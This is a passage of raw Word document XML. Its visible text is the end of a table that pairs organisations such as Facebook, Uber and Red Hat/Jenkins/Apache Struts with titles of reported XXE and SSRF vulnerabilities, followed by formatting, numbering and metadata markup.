      </w:tr>
      <w:tr w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w14:paraId="5EBD8D1E" w14:textId="77777777" w:rsidTr="00E51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5723" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>Facebook (Bug Bounty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33ABBEA5" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>XXE in SAML SSO response parsing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w14:paraId="427C8A3D" w14:textId="77777777" w:rsidTr="00E51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9530" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:lastRenderedPageBreak/>
              <w:t>Red Hat / Jenkins / Apache Struts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AF70B63" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>Critical XXE issues in XML parsers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w14:paraId="7D7EB2AC" w14:textId="77777777" w:rsidTr="00E51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259F" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>Uber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524007F9" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E51B4A">
              <w:t>SSRF via XXE in legacy API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E0E864A" w14:textId="77777777" w:rsidR="00E51B4A" w:rsidRPr="00E51B4A" w:rsidRDefault="00E51B4A" w:rsidP="00E51B4A"/>
    <w:sectPr w:rsidR="00E51B4A" w:rsidRPr="00E5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4D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71A4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0666"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28F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5DD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0D2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C1B62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BDE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D6CB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A42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16177"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A70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91457"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="136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5CC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC923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60572">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1540507257">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1591962083">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="741486578">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="288780390">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="104423513">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="281570504">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="816335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2"/>
    <w:rsid w:val="000A0952"/>
    <w:rsid w:val="006B4F1F"/>
    <w:rsid w:val="00751FC5"/>
    <w:rsid w:val="00927497"/>
    <w:rsid w:val="00BE5A5A"/>
    <w:rsid w:val="00E51B4A"/>
    <w:rsid w:val="00F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93AB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{63FAD75D-6B94-4FDF-A593-2C2D6C97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5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E5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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-08T15:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-08T22:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>